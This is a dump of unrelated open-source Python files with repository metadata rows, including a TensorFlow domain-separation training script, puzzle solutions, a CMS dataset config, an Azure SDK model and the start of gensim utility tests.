    for problem_dict in params.run_problem_list:
        problem_list += list(problem_dict.keys())
        problem_chunk.append(list(problem_dict.keys()))
    # get dummy labels
    def _create_dummpy_label(problem_type):
        # Classification problems take a scalar dummy label; everything else
        # gets a max_seq_len-long vector of zeros.
        if problem_type == 'cls':
            return 0
        else:
            return [0]*params.max_seq_len
    dummy_label_dict = {problem+'_label_ids': _create_dummpy_label(
        params.problem_type[problem]) for problem in problem_list if params.problem_type[problem] != 'pretrain'}
    # init gen
    gen_dict = {problem: params.read_data_fn[problem](params, mode)
                for problem in problem_list}
    while gen_dict:
        # sample problem to train
        if len(problem_chunk) > 1:
            # Sampling weight per chunk is taken from its first problem's
            # data count.
            data_num_list = [params.data_num_dict[chunk[0]]
                             for chunk in problem_chunk]
            if params.multitask_balance_type == 'data_balanced':
                sample_prob = np.array(data_num_list) / np.sum(data_num_list)
                current_problem_chunk_ind = np.random.choice(
                    list(range(len(problem_chunk))), p=sample_prob)
                current_problem_chunk = problem_chunk[current_problem_chunk_ind]
            elif params.multitask_balance_type == 'problem_balanced':
                # Uniform over chunks regardless of dataset size.
                sample_prob = np.array(
                    [1]*len(data_num_list)) / np.sum([1]*len(data_num_list))
                current_problem_chunk_ind = np.random.choice(
                    list(range(len(problem_chunk))), p=sample_prob)
                current_problem_chunk = problem_chunk[current_problem_chunk_ind]
        else:
            current_problem_chunk = problem_chunk[0]
        # create loss multiplier
        loss_multiplier = {}
        for problem in problem_list:
            if problem in current_problem_chunk:
                loss_multiplier[problem+'_loss_multiplier'] = 1
            else:
                loss_multiplier[problem+'_loss_multiplier'] = 0
        base_dict = {}
        base_input = None
        for problem in current_problem_chunk:
            try:
                instance = next(gen_dict[problem])
            except StopIteration:
                # In training, restart an exhausted generator; in eval,
                # retire it (the while loop ends when all are retired).
                if mode == 'train':
                    gen_dict[problem] = params.read_data_fn[problem](
                        params, mode)
                    instance = next(gen_dict[problem])
                else:
                    del gen_dict[problem]
                    continue
            except KeyError:
                continue
            base_dict.update(instance)
            if base_input is None:
                base_input = instance['input_ids']
            elif not params.augument_mask_lm:
                # Chained problems must be built on the exact same inputs.
                assert base_input == instance[
                    'input_ids'], 'Inputs id of two chained problem not aligned. Please double check!'
        if not base_dict:
            continue
        # add dummpy labels
        for dummy_problem in dummy_label_dict:
            if dummy_problem not in base_dict:
                base_dict[dummy_problem] = dummy_label_dict[dummy_problem]
        # add loss multipliers
        base_dict.update(loss_multiplier)
        yield base_dict
| [
"[email protected]"
] | |
50c69f457a69549e37c8d673248b6a8b5ea1b3a8 | 8f02d21497912679d6ab91ea382ac9c477bda4fe | /setup.py | fb31227d6331999511c7297da29c6fb9b29c9e53 | [
"MIT"
] | permissive | DouglasWilcox/tpRigToolkit-dccs-maya-plugins-rbfsolver | ae2291f3e7117010341faeb7881998ec885dc216 | 3503c9b3982fe550a3d53dde79d3bf427c1b2289 | refs/heads/master | 2021-03-13T14:24:55.464354 | 2020-02-11T00:28:31 | 2020-02-11T00:28:31 | 246,688,218 | 1 | 0 | null | 2020-03-11T22:00:02 | 2020-03-11T22:00:01 | null | UTF-8 | Python | false | false | 104 | py | from setuptools import setup
from tpRigToolkit.dccs.maya.plugins.rbfsolver import __version__
setup()
| [
"[email protected]"
] | |
e55349cdae31ad6838c68bcf8a78353c4625794a | 1e0355b293100873cedfcac789655a35180781db | /BOJ1541.py | 80f1eee1110f147baa91c39f0bbea9e2989c2d24 | [
"MIT"
] | permissive | INYEONGKIM/BOJ | 47dbf6aeb7a0f1b15208866badedcd161c00ee49 | 5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc | refs/heads/master | 2021-06-14T13:50:04.124334 | 2021-03-09T14:04:14 | 2021-03-09T14:04:14 | 168,840,573 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | s=input().split("-")
# BOJ 1541 ("Lost Parentheses"): the expression was split on '-' into `s`,
# so the minimum value is the first segment's sum minus the sum of every
# later segment (a '-' makes everything after it subtractable).
def _segment_total(segment):
    # Sum of the '+'-joined numbers inside one '-'-separated segment.
    return sum(int(tok) for tok in segment.split("+"))

res = 0 if s[0] == "" else _segment_total(s[0])
for segment in s[1:]:
    res -= _segment_total(segment)
print(res)
| [
"[email protected]"
] | |
aa718d4daf7a3e18af3a89fdaa2347cee9d3e036 | 7ba22c9826a1574777a08fb634ff15c56de6cb98 | /domain_adaptation/domain_separation/dsn_train.py | 2453d204f037ace6938252c8981854f5ef640dac | [] | no_license | dhanya1/full_cyclist | 02b85b8331f8ca9364169484ab97b32920cbbd14 | dd12c8d8a3deaaea15041e54f2e459a5041f11c2 | refs/heads/master | 2022-10-17T13:36:51.886476 | 2018-07-30T15:46:02 | 2018-07-30T15:46:02 | 142,896,293 | 0 | 1 | null | 2022-10-05T10:11:01 | 2018-07-30T15:46:15 | Python | UTF-8 | Python | false | false | 10,701 | py | # Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training for Domain Separation Networks (DSNs)."""
from __future__ import division
import tensorflow as tf
from domain_adaptation.datasets import dataset_factory
import dsn
slim = tf.contrib.slim
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('batch_size', 32,
'The number of images in each batch.')
tf.app.flags.DEFINE_string('source_dataset', 'pose_synthetic',
'Source dataset to train_bkp on.')
tf.app.flags.DEFINE_string('target_dataset', 'pose_real',
'Target dataset to train_bkp on.')
tf.app.flags.DEFINE_string('target_labeled_dataset', 'none',
'Target dataset to train_bkp on.')
tf.app.flags.DEFINE_string('dataset_dir', None,
'The directory where the dataset files are stored.')
tf.app.flags.DEFINE_string('master', '',
'BNS name of the TensorFlow master to use.')
tf.app.flags.DEFINE_string('train_log_dir', '/tmp/da/',
'Directory where to write event logs.')
tf.app.flags.DEFINE_string(
'layers_to_regularize', 'fc3',
'Comma-separated list of layer names to use MMD regularization on.')
tf.app.flags.DEFINE_float('learning_rate', .01, 'The learning rate')
tf.app.flags.DEFINE_float('alpha_weight', 1e-6,
'The coefficient for scaling the reconstruction '
'loss.')
tf.app.flags.DEFINE_float(
'beta_weight', 1e-6,
'The coefficient for scaling the private/shared difference loss.')
tf.app.flags.DEFINE_float(
'gamma_weight', 1e-6,
'The coefficient for scaling the shared encoding similarity loss.')
tf.app.flags.DEFINE_float('pose_weight', 0.125,
'The coefficient for scaling the pose loss.')
tf.app.flags.DEFINE_float(
'weight_decay', 1e-6,
'The coefficient for the L2 regularization applied for all weights.')
tf.app.flags.DEFINE_integer(
'save_summaries_secs', 60,
'The frequency with which summaries are saved, in seconds.')
tf.app.flags.DEFINE_integer(
'save_interval_secs', 60,
'The frequency with which the model is saved, in seconds.')
tf.app.flags.DEFINE_integer(
'max_number_of_steps', None,
'The maximum number of gradient steps. Use None to train_bkp indefinitely.')
tf.app.flags.DEFINE_integer(
'domain_separation_startpoint', 1,
'The global step to add the domain separation losses.')
tf.app.flags.DEFINE_integer(
'bipartite_assignment_top_k', 3,
'The number of top-k matches to use in bipartite matching adaptation.')
tf.app.flags.DEFINE_float('decay_rate', 0.95, 'Learning rate decay factor.')
tf.app.flags.DEFINE_integer('decay_steps', 20000, 'Learning rate decay steps.')
tf.app.flags.DEFINE_float('momentum', 0.9, 'The momentum value.')
tf.app.flags.DEFINE_bool('use_separation', False,
'Use our domain separation model.')
tf.app.flags.DEFINE_bool('use_logging', False, 'Debugging messages.')
tf.app.flags.DEFINE_integer(
'ps_tasks', 0,
'The number of parameter servers. If the value is 0, then the parameters '
'are handled locally by the worker.')
tf.app.flags.DEFINE_integer(
'num_readers', 4,
'The number of parallel readers that read data from the dataset.')
tf.app.flags.DEFINE_integer('num_preprocessing_threads', 4,
'The number of threads used to create the batches.')
tf.app.flags.DEFINE_integer(
'task', 0,
'The Task ID. This value is used when training with multiple workers to '
'identify each worker.')
tf.app.flags.DEFINE_string('decoder_name', 'small_decoder',
'The decoder to use.')
tf.app.flags.DEFINE_string('encoder_name', 'default_encoder',
'The encoder to use.')
################################################################################
# Flags that control the architecture and losses
################################################################################
tf.app.flags.DEFINE_string(
'similarity_loss', 'grl',
'The method to use for encouraging the common encoder codes to be '
'similar, one of "grl", "mmd", "corr".')
tf.app.flags.DEFINE_string('recon_loss_name', 'sum_of_pairwise_squares',
'The name of the reconstruction loss.')
tf.app.flags.DEFINE_string('basic_tower', 'pose_mini',
'The basic tower building block.')
def provide_batch_fn():
  """ The provide_batch function to use. """
  # Indirection point so tests / subclasses can swap in a different batch
  # provider; main() calls provide_batch_fn()(...) for both domains.
  return dataset_factory.provide_batch
def main(_):
  """Builds the Domain Separation Network training graph and runs training.

  TF1/slim workflow: reads source and target batches, optionally mixes in
  labeled target data (semi-supervised), constructs the DSN model and trains
  with momentum SGD under an exponentially decaying learning rate.
  """
  model_params = {
      'use_separation': FLAGS.use_separation,
      'domain_separation_startpoint': FLAGS.domain_separation_startpoint,
      'layers_to_regularize': FLAGS.layers_to_regularize,
      'alpha_weight': FLAGS.alpha_weight,
      'beta_weight': FLAGS.beta_weight,
      'gamma_weight': FLAGS.gamma_weight,
      'pose_weight': FLAGS.pose_weight,
      'recon_loss_name': FLAGS.recon_loss_name,
      'decoder_name': FLAGS.decoder_name,
      'encoder_name': FLAGS.encoder_name,
      'weight_decay': FLAGS.weight_decay,
      'batch_size': FLAGS.batch_size,
      'use_logging': FLAGS.use_logging,
      'ps_tasks': FLAGS.ps_tasks,
      'task': FLAGS.task,
  }
  g = tf.Graph()
  with g.as_default():
    with tf.device(tf.train.replica_device_setter(FLAGS.ps_tasks)):
      # Load the data.
      # NOTE(review): split name 'train_bkp' looks like a renamed 'train'
      # split -- confirm dataset_factory actually exposes it.
      source_images, source_labels = provide_batch_fn()(
          FLAGS.source_dataset, 'train_bkp', FLAGS.dataset_dir, FLAGS.num_readers,
          FLAGS.batch_size, FLAGS.num_preprocessing_threads)
      target_images, target_labels = provide_batch_fn()(
          FLAGS.target_dataset, 'train_bkp', FLAGS.dataset_dir, FLAGS.num_readers,
          FLAGS.batch_size, FLAGS.num_preprocessing_threads)
      # In the unsupervised case all the samples in the labeled
      # domain are from the source domain.
      domain_selection_mask = tf.fill((source_images.get_shape().as_list()[0],),
                                      True)
      # When using the semisupervised model we include labeled target data in
      # the source labelled data.
      if FLAGS.target_labeled_dataset != 'none':
        # 1000 is the maximum number of labelled target samples that exists in
        # the datasets.
        target_semi_images, target_semi_labels = provide_batch_fn()(
            FLAGS.target_labeled_dataset, 'train_bkp', FLAGS.batch_size)
        # Calculate the proportion of source domain samples in the semi-
        # supervised setting, so that the proportion is set accordingly in the
        # batches.
        proportion = float(source_labels['num_train_samples']) / (
            source_labels['num_train_samples'] +
            target_semi_labels['num_train_samples'])
        rnd_tensor = tf.random_uniform(
            (target_semi_images.get_shape().as_list()[0],))
        domain_selection_mask = rnd_tensor < proportion
        source_images = tf.where(domain_selection_mask, source_images,
                                 target_semi_images)
        source_class_labels = tf.where(domain_selection_mask,
                                       source_labels['classes'],
                                       target_semi_labels['classes'])
        if 'quaternions' in source_labels:
          source_pose_labels = tf.where(domain_selection_mask,
                                        source_labels['quaternions'],
                                        target_semi_labels['quaternions'])
          (source_images, source_class_labels, source_pose_labels,
           domain_selection_mask) = tf.train.shuffle_batch(
               [
                   source_images, source_class_labels, source_pose_labels,
                   domain_selection_mask
               ],
               FLAGS.batch_size,
               50000,
               5000,
               num_threads=1,
               enqueue_many=True)
        else:
          (source_images, source_class_labels,
           domain_selection_mask) = tf.train.shuffle_batch(
               [source_images, source_class_labels, domain_selection_mask],
               FLAGS.batch_size,
               50000,
               5000,
               num_threads=1,
               enqueue_many=True)
        source_labels = {}
        source_labels['classes'] = source_class_labels
        # NOTE(review): source_labels was just rebound to a fresh dict, so this
        # 'quaternions' check can never be true here -- verify intent.
        if 'quaternions' in source_labels:
          source_labels['quaternions'] = source_pose_labels
      slim.get_or_create_global_step()
      tf.summary.image('source_images', source_images, max_outputs=3)
      tf.summary.image('target_images', target_images, max_outputs=3)
      dsn.create_model(
          source_images,
          source_labels,
          domain_selection_mask,
          target_images,
          target_labels,
          FLAGS.similarity_loss,
          model_params,
          basic_tower_name=FLAGS.basic_tower)
      # Configure the optimization scheme:
      learning_rate = tf.train.exponential_decay(
          FLAGS.learning_rate,
          slim.get_or_create_global_step(),
          FLAGS.decay_steps,
          FLAGS.decay_rate,
          staircase=True,
          name='learning_rate')
      tf.summary.scalar('learning_rate', learning_rate)
      tf.summary.scalar('total_loss', tf.losses.get_total_loss())
      opt = tf.train.MomentumOptimizer(learning_rate, FLAGS.momentum)
      tf.logging.set_verbosity(tf.logging.INFO)
      # Run training.
      loss_tensor = slim.learning.create_train_op(
          slim.losses.get_total_loss(),
          opt,
          summarize_gradients=True,
          colocate_gradients_with_ops=True)
      slim.learning.train(
          train_op=loss_tensor,
          logdir=FLAGS.train_log_dir,
          master=FLAGS.master,
          is_chief=FLAGS.task == 0,
          number_of_steps=FLAGS.max_number_of_steps,
          save_summaries_secs=FLAGS.save_summaries_secs,
          save_interval_secs=FLAGS.save_interval_secs)
if __name__ == '__main__':
  # Standard TF1 entry point: parses the flags above, then calls main().
  tf.app.run()
| [
"[email protected]"
] | |
b4a2db0fc6da43c2eb0ad5f2cd65f2c360d65ad7 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /eDQDChGrv6y4fd44j_20.py | 1a24d4d5555b5a19f0f2a0043b0899ec7134f363 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,156 | py | """
A billboard is an `m * n` list, where each list element consists of either one
letter or a blank space. You are given a phrase and the billboard dimensions.
Create a function that determines whether you can place the complete phrase on
the billboard.
There are two rules:
1. If there is a space between two words:
* If they are on the same row, you must put a space.
* If they are two different rows, the space is optional.
2. You can only put COMPLETE words on a row.
To illustrate, `can_put("GOOD MORN", [2, 4])` should yield `True`, since while
there is a space between "GOOD" and "MORN", it's not needed since both words
are on separate rows.
[
["G", "O", "O", "D"],
["M", "O", "R", "N"]
]
On the other hand `can_put("GOOD MORN", [1, 8])` should yield `False`. Since
both words reside in the first row, we require nine spots, and eight would
yield the incomplete phrase "GOOD MOR".
[
["G", "O", "O", "D", "_", "M", "O", "R"]
]
We would also return `False` if we could not fit a word on a row. So
`can_put("GOOD MORN", [3,3])` should yield `False`, since we can only fit
"GOO" on the first row.
[
["G", "O", "O"],
["D", "_", "M"],
["O", "R", "N"]
]
# No good!
### Examples
can_put("HEY JUDE", [2, 4]) ➞ True
can_put("HEY JUDE", [1, 8]) ➞ True
can_put("HEY JUDE", [1, 7]) ➞ False
can_put("HEY JUDE", [4, 3]) ➞ False
### Notes
It is okay to leave extra empty spaces on one line if you cannot fit two words
with a space. For example, in a 5 x 5 billboard, you can put "BE" on the first
row and "HAPPY" on the second row.
"""
def can_put(message, dimensions):
    """Return True if every word of `message` fits on a `dimensions` billboard.

    `dimensions` is `[rows, cols]`. Words placed on the same row are separated
    by one space; a row break makes the separating space optional. Words may
    not be split across rows.
    """
    rows, cols = dimensions

    def place(word, row, col):
        """Return the cursor after placing `word`, or None if it cannot fit."""
        # Try the remainder of the current row first; the cursor already
        # accounts for the mandatory space after the previous word.
        if len(word) <= cols - col:
            return row, col + len(word) + 1
        # Otherwise start the next row, if one exists and the word fits a row.
        if row + 1 < rows and len(word) <= cols:
            return row + 1, len(word) + 1
        return None

    row, col = 0, 0
    for word in message.split():
        spot = place(word, row, col)
        if spot is None:
            return False
        row, col = spot
    return True
| [
"[email protected]"
] | |
f0c76d1fa08e79952459a729a781ae1b1a1a853d | 78144baee82268a550400bbdb8c68de524adc68f | /Production/python/Fall17/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8_cff.py | c7058877ed083db8890af32476f19744018f6428 | [] | no_license | tklijnsma/TreeMaker | e6989c03189b849aff2007bad22e2bfc6922a244 | 248f2c04cc690ef2e2202b452d6f52837c4c08e5 | refs/heads/Run2_2017 | 2023-05-26T23:03:42.512963 | 2020-05-12T18:44:15 | 2020-05-12T18:44:15 | 263,960,056 | 1 | 2 | null | 2020-09-25T00:27:35 | 2020-05-14T15:57:20 | null | UTF-8 | Python | false | false | 3,838 | py | import FWCore.ParameterSet.Config as cms
# Process every event in the listed input files (-1 = no limit).
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
# PoolSource reading the primary files below; no secondary (parent) files.
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
# MiniAODv2 files for the Fall17 SMS-T2tt signal point (mStop=1200, mLSP=100), TuneCP2.
readFiles.extend( [
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/001CEA5F-72C9-E811-BA66-00259029E84C.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/2CD7E036-72C9-E811-B8BC-B499BAAC0572.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/4A60530E-72C9-E811-9AC1-1866DA879ED8.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/5A6EF34A-72C9-E811-B5F2-001E67DDC051.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/D8371BB4-7DC7-E811-B485-002590D9D8AE.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/1ED8C138-4BBB-E811-B449-246E96D10C24.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/2C39513A-4BBB-E811-A565-F02FA768CFE4.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/30571216-4BBB-E811-AD1A-0CC47A0AD476.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/42FFEC30-4BBB-E811-81B7-001E67397003.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/58987AEF-4ABB-E811-BFD6-E0071B6C9DF0.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/5E81430E-5CBA-E811-9AE8-002590D9D8AE.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/60152222-4BBB-E811-AD87-0CC47AD990C4.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/6A2711BC-4BBB-E811-88C7-0026B92786AC.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/90B7CF6A-4BBB-E811-A85C-1866DAEB1FC8.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/D6F1494D-4BBB-E811-8551-7CD30ACE1B58.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/F48D6DF7-4ABB-E811-8D2F-0CC47A7C3424.root',
       '/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/60000/D0903CAD-F5C5-E811-80BC-002590D9D8C4.root',
] )
| [
"[email protected]"
] | |
4f4b68ca0c6623d671747618cbe6275ec180ab9f | b22cbe574c6fd43fde3dc82441805917b5996bb2 | /test/util.py | 9a84f69774201372124c9d12aad475c699637b11 | [] | no_license | matthagy/hlab | 7a7b16526ee06f9b6211e387795e09c6438b536c | 1bea77cf6df460f1828f99f3a54251d20e2d0f3d | refs/heads/master | 2021-01-25T03:26:52.311278 | 2012-07-23T16:20:11 | 2012-07-23T16:20:11 | 2,352,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,332 | py | '''Assorted unit tests utilities
'''
import unittest
from HH2.pathutils import FilePath,DirPath
def basepath():
    """Return the directory that contains the package root of this module.

    Derived by stripping this module's dotted path from its file location;
    used below to translate file paths back into importable module names.
    """
    filebase = FilePath(__file__).abspath().stripext()
    backpath = __name__.replace('.','/')
    assert filebase.endswith(backpath)
    path = DirPath(filebase[:-len(backpath)])
    assert path.isdir()
    return path
# Replace the helper with its result: `basepath` is a DirPath from here on.
basepath = basepath()
# Shared loader used by load_file_tests().
loader = unittest.TestLoader()
def load_file_tests(path):
    """Import the module at `path` (a .py file under `basepath`) and return
    its unittest test suite."""
    path = path.stripext()
    assert path.startswith(basepath)
    # Turn the file path relative to basepath into a dotted module name.
    name = path[len(basepath)+1::].replace('/','.')
    mod = __import__(name, fromlist=name.rsplit('.',1)[-1:])
    return loader.loadTestsFromModule(mod)
def load_directory_tests(path, recursive=True):
    """Collect unit tests from every Python module under `path`.

    Skips hidden files, dunder files (e.g. __init__.py), and the 'util'
    helper module; recurses into subdirectories when `recursive` is True.
    Returns a flat list of test suites.
    """
    tests = []
    for p in DirPath(path):
        if p.isdir():
            if recursive:
                tests.extend(load_directory_tests(p, recursive=True))
        elif (p.endswith('.py') and not p.basename().startswith('.') and
              # Fix: `p.statswith('__')` was a typo that raised AttributeError
              # at runtime; the intent is to skip __init__.py / __main__.py.
              not p.basename().startswith('__') and
              # NOTE(review): basename() likely keeps the '.py' suffix, so
              # this 'util' exclusion may never match -- verify.
              p.basename() not in ['util']):
            tests.extend(load_file_tests(p))
    return tests
return tests
def test_directory(basefile):
basefile = FilePath(basefile)
assert basefile.basename().startswith('__main__.py')
tests = unittest.TestSuite(load_directory_tests(basefile.abspath().parent()))
runner = unittest.TextTestRunner(verbosity=2)
runner.run(tests)
| [
"[email protected]"
] | |
e91fb3b0579a68d2e180e42add34ad6919708d82 | 3929d114c1bc6aef86402300a8d5b278849d41ae | /186. Reverse Words in a String II.py | 8cc8dc1f28c024f2e87d00719eb97c60a509c32c | [] | no_license | lxyshuai/leetcode | ee622235266017cf18da9b484f87c1cf9ceb91d0 | 5f98270fbcd2d28d0f2abd344c3348255a12882a | refs/heads/master | 2020-04-05T21:29:37.140525 | 2018-12-16T13:17:15 | 2018-12-16T13:17:15 | 157,222,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,135 | py | """
Given an input string, reverse the string word by word. A word is defined as a sequence of non-space characters.
The input string does not contain leading or trailing spaces and the words are always separated by a single space.
For example,
Given s = "the sky is blue",
return "blue is sky the".
Could you do it in-place without allocating extra space?
"""
class Solution(object):
    def reverseWords(self, s):
        """Reverse the order of words in `s`, preserving the characters of
        each word ("the sky is blue" -> "blue is sky the").

        Strategy: reverse the whole string, then reverse each word in place.

        :type s: str
        :rtype: str
        """
        def reverse(string_list, left, right):
            # In-place reversal of string_list[left..right], inclusive.
            while left < right:
                string_list[left], string_list[right] = string_list[right], string_list[left]
                left += 1
                right -= 1
        string_list = list(s)
        reverse(string_list, 0, len(string_list) - 1)
        left = 0
        right = 0
        while right < len(string_list):
            if string_list[right].isspace():
                reverse(string_list, left, right - 1)
                left = right + 1
            right += 1
        # Fix: the trailing word is not followed by a space, so the loop
        # above never un-reversed it ("...eht" instead of "...the").
        reverse(string_list, left, len(string_list) - 1)
        return ''.join(string_list)
if __name__ == '__main__':
    # Smoke test. NOTE: Python 2 print statement -- this file targets Python 2.
    print Solution().reverseWords('a b c d')
| [
"[email protected]"
] | |
9dfef73bdb4ca36d08e448d5637ff33d58b50b88 | 325fde42058b2b82f8a4020048ff910cfdf737d7 | /src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2019_02_01/models/managed_cluster_addon_profile_py3.py | 71e05cd14c0e9e64885cfee910165304b5df4421 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | ebencarek/azure-cli-extensions | 46b0d18fe536fe5884b00d7ffa30f54c7d6887d1 | 42491b284e38f8853712a5af01836f83b04a1aa8 | refs/heads/master | 2023-04-12T00:28:44.828652 | 2021-03-30T22:34:13 | 2021-03-30T22:34:13 | 261,621,934 | 2 | 5 | MIT | 2020-10-09T18:21:52 | 2020-05-06T01:25:58 | Python | UTF-8 | Python | false | false | 1,290 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ManagedClusterAddonProfile(Model):
    """A Kubernetes add-on profile for a managed cluster.

    All required parameters must be populated in order to send to Azure.

    :param enabled: Required. Whether the add-on is enabled or not.
    :type enabled: bool
    :param config: Key-value pairs for configuring an add-on.
    :type config: dict[str, str]
    """

    # msrest reads _validation and _attribute_map to drive request
    # validation and (de)serialization; do not edit by hand -- this class
    # is generated by AutoRest.
    _validation = {
        'enabled': {'required': True},
    }

    _attribute_map = {
        'enabled': {'key': 'enabled', 'type': 'bool'},
        'config': {'key': 'config', 'type': '{str}'},
    }

    def __init__(self, *, enabled: bool, config=None, **kwargs) -> None:
        super(ManagedClusterAddonProfile, self).__init__(**kwargs)
        self.enabled = enabled
        self.config = config
| [
"[email protected]"
] | |
419db0786d502a3cf9c1eae20144f684848c9409 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/gensim/test/test_utils.py | 240900129cf6621eddafef08f2c921360b47d10e | [
"Unlicense"
] | permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 6,864 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated tests for checking various utils functions.
"""
import logging
import unittest
import numpy as np
from six import iteritems
from gensim import utils
class TestIsCorpus(unittest.TestCase):
    """Tests for utils.is_corpus, which reports whether an object is a
    gensim bag-of-words corpus and returns the (possibly rewound) object."""

    def test_None(self):
        # None is not a corpus.
        self.assertEqual((False, None), utils.is_corpus(None))

    def test_simple_lists_of_tuples(self):
        # Lists of documents, each a list of (int, float) pairs, are corpora:
        # one or several documents, with one or several words each.
        candidates = [
            [[(0, 4.)]],
            [[(0, 4.), (1, 2.)]],
            [[(0, 4.), (1, 2.), (2, 5.), (3, 8.)]],
            [[(0, 4.)], [(1, 2.)]],
            [[(0, 4.)], [(1, 2.)], [(2, 5.)], [(3, 8.)]],
        ]
        for corpus in candidates:
            self.assertEqual((True, corpus), utils.is_corpus(corpus))

    def test_int_tuples(self):
        # Integer weights are accepted as well as floats.
